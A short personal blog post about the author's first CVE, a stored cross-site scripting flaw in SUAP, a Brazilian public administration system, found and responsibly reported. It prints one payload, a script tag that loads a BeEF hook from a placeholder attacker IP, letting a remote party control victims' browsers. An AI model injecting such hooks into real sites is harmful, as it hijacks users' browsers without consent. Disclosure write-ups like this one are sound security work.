2020/04/28

CVE-2019–7634: My first CVE

In this post, I will provide details about my first CVE. The vulnerability was discovered when I was on vacation and needed to update a piece of personal information in SUAP (Sistema Unificado de Administração Pública), a system used by several federal public institutions in Brazil.

The vulnerability

The vulnerability was Cross-site scripting (XSS). This kind of threat allows attackers to inject JavaScript code inside a web page. In the case of SUAP, it was a stored XSS. In this way, the attacker could also save the malicious code in the database of the application.

After trying different payloads on various pages of the system, I finally found a flaw when updating the user’s data. I simply append the following payload to a field in the form:

<script src="<IP>:3000/hook.js"></script>

And Voilà! This code will open a connection to Beef, allowing me to inject different payloads in the victim’s browser remotely.

After this, I immediately contacted the administration of the service with a Proof of Concept (PoC). The response was very fast and they quickly corrected the flaw. I suppose that now all the federal institutions using SUAP received the update.

XSS vulnerabilities are very common and are not that hard to be discovered, but everyone has to start somewhere. Besides, I had the opportunity to learn about the whole process of requesting a CVE.